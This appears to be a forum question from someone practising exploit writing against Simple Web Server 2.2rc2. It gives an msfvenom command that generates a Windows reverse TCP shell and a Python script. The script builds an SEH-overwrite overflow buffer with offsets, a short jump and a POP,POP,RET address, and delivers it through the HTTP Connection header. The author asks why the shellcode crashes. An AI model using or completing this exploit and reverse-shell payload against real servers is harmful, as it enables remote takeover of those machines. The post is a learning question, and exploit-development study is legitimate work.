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Stack Buffer Overflow using SEH in Simple Web Server 2.2rc2

Çağlar Arlı      -    8 Views

Stack Buffer Overflow using SEH in Simple Web Server 2.2rc2

I am practicing writing exploit for Simple Web Server 2.2rc2. I was able to:

  • find proper offset to overwrite SE Handler and Next SEH
  • find POP,POP,RET address

My problem is that, I can't execute my shell (generated by msfvenom:

msfvenom --platform windows -a x86 -p windows/shell_reverse_tcp LHOST=IP LPORT=80 EXITFUNC=thread -b "\x00\x0a\x0d" -f python -v shellcode

I have tried to:

  • place my code directly after SE Handler
  • prepend shellcode with stack adjustment
  • adding nopsled before shellcode

All I see in debugger is that, my shellcode crash app.

Here is my current code:


import socket,struct,os

ip = ""
port = 80

rsp_offset = 2048
seh_offset = 2280
buf_size   = 2400 

#shellcode= # generated by msfvenom

buf = "" 
buf+= "A" * (rsp_offset-len(buf)) 
buf+= "BBBB" # EIP 
buf+= "C" * (seh_offset-len(buf)) 
buf+= "\xeb\x07\x90\x90" # Next SEH: JMP +7 to shellcode 
buf+= struct.pack("<I", 0x6FC5447E) # POP,POP,RET 
buf+= "\x90\x83\xec\x20" # stack adjustment
buf+= shellcode
#buf+= "F" * (buf_size-len(buf)) 

req = "GET / HTTP/1.1\r\n" 
req += "Host:\r\n" 
req += "Connection:" + buf + "\r\n" 
req += "\r\n" 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.connect((ip, port)) 

Can someone give me a hint, what I am doing wrong? App is available here